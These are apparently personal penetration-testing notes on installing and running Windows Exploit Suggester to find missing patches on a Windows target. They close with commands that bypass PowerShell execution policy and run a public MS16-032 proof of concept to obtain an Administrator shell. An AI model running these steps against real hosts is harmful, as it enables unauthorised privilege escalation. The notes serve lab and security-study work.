Windows Exploit Suggester
Original repo: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
My forked: https://github.com/amandaguglieri/Windows-Exploit-Suggester
This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.
We will create an environment for running python2.7.18, which is required:
| # List my pyenv python versions and 2.7.18 is missing
pyenv versions
# Install version 2.7.18
pyenv install 2.7.18
# Create a virtualenv that uses python2.7.18
pyenv virtualenv 2.7.18 tooling2
# Activate the env
pyenv activate tooling2
# Make sure you have the 2.7.18 python version running
python -V
# Install python dependencies
sudo wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz
sudo tar -xf setuptools-2.0.tar.gz
cd setuptools-2.0/
python setup.py install
cd ..
sudo wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz
sudo tar -xf xlrd-1.0.0.tar.gz
cd xlrd-1.0.0/
python setup.py install
|
Now we will gather Systeminfo command output from the windows host target:
And we will save this in out kali machine as systeminfo.txt.
Install the Windows Exploit Suggerster:
| git clone https://github.com/amandaguglieri/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester
|
We then need to update our local copy of the Microsoft Vulnerability database. This command will save the contents to a local Excel file.
| python windows-exploit-suggester.py --update
|
Output:
| [*] initiating winsploit version 3.3...
[+] writing to file 2025-04-29-mssb.xls
[*] done
|
Running Windows Exploit Suggester:
| python windows-exploit-suggester.py --database 2025-04-29-mssb.xls --systeminfo systeminfo.txt
|
#### Exploiting MS16-032 with PowerShell PoC
We will use: https://www.exploit-db.com/exploits/39719
| Set-ExecutionPolicy bypass -scope process
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032
|
And we obtain a cmd with Administrator level
Last update: 2025-05-18
Created: May 18, 2025 16:41:27